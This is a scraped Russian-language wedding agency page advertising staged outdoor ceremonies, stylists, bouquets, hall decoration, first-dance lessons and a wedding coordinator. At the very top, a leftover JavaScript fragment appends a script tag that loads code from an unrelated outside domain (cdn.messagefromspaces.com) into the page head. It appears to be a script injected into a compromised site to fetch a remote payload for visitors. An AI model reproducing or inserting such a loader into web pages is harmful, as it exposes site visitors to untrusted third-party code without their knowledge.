, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Выездная регистрация

Если ваша давняя мечта это выездная регистрация – нет проблем! Есть два варианта – реальная выездная регистрация или, гораздо более экономичный вариант, разыгранная нашими актерами. Второй вариант подразумевает следующее: на место выездной регистрации вы приезжаете уже со свидетельством о браке, полученным в загсе, а наши актеры воспроизводят ту красивую регистрацию на берегу залива или озера которую вы так часто видите в западных фильмах. Звучит красивая музыка, закат, гости сидят на белоснежных стульях, а вы медленно идете по красной ковровой дорожке к цветочной арке, чтобы соединить свои сердца священными узами брака… вдалеке плещутся волны, розовеет линия над горизонтом, в воздухе стоит приятный аромат чистоты и свежести… разве не прекрасно? Очень романтично, а главное реально! Наша компания располагает всем необходимым для выездной регистрации, и, даже если не повезет с погодой. мы готовы уладить и этот вопрос!


Свадебный стилист

Свадебный стилист – это не просто стилист. Это человек, который, казалось бы о таком узком направлении как свадьба знает всё. Но если смотреть глубже, то свадьба оказывается очень большим и сложным видом деятельности для стилиста. Его задача учесть ваши вкусы, капризы, веянья моды, вашу внешность и создать неповторимый образ, который будет сочетаться с вашим характером. Свадебный стилист приводит к одному знаменателю множество свадебных нюансов. Платье невесты, костюм жениха, букет, бутоньерка, украшение зала, прическа, макияж, оформление президиума для молодых – все это должно безупречно соответствовать друг-другу!


Прическа и макияж

Тут нам добавить нечего. Бессмысленно рассуждать о важности того, чтобы прическу и макияж делал опытный профессионал – фотографии работ нашего стилиста говорят сами за себя!


Букет невесты

Букет — важная деталь образа невесты, к его выбору нужно подходить серьезно. Он будет в центре ваших свадебных фото и должен сочетаться с платьем, прической и при этом быть прочным, сохранять свежий внешний вид до конца свадебного торжества!

Выбрать букет вы можете здесь: «Ассортимент букетов для невесты»

Точная стоимость варьируется в зависимости от сезона. Все подробности по телефону 955-99-51

Разумеется, наш флорист может создать эксклюзивную цветочную композицию специально для вас!

Оформление зала

Еще один немаловажный шаг в создании неповторимого образа вашей свадьбы это украшение зала. Наши дизайнеры, флористы и дизайнеры по шарам помогут вам в этом.

  • Оформление цветами
  • Оформление шарами

Первый свадебный танец

Друзья, прошли те времена, когда было нормой вместо свадебного танца протсо кружиться, обняв друг-друга как на школьной дискотеке! Ваши гости хотят зрелищ, ваш фотограф ждет момента для интересного снимка, а ваш видеооператор жаждет достойных кадров для красивого фильма! И вам для этого стоит потрудиться. Наш опытный хореограф Ирина сделает из вас звезд танцпола всего за 2-5 занятий!Поверьте это несказанное удовольствие наслаждаться восхищенными взглядами гостей, а не топтаться, наступая на подол платья, в ожидании «когда же эта песня закончится»… насладитесь торжественным моментом в полной мере! Получите свои заслуженные овации после красивого и романтического свадебного танца или шокируйте гостей, уже вошедшим в моду, комическим танцем!

Свадебный распорядитель

Свадебный распорядитель – во время торжества персона не заметная, но если вы хотите, чтобы всё шло гладко, чтобы к вам не подбегали официанты с вопросом «когда нести горячее» или «мы не можем найти шампанское которое вы привезли», чтобы во время выступления артистов вдруг не вынесли торт, чтобы о сюрпризе, который приготовил жених, все не узнали раньше времени, выйдя на перекур, чтобы жених не выбегал на улицу во время свадьбы встречать танцоров, которые не могут дорогу к ресторану найти, чтобы букет невесты приехал вовремя и по нужному адресу… И еще сто тысяч «чтобы», которыми займется свадебный распорядитель и оградит вашу свадьбу от накладок и казусов!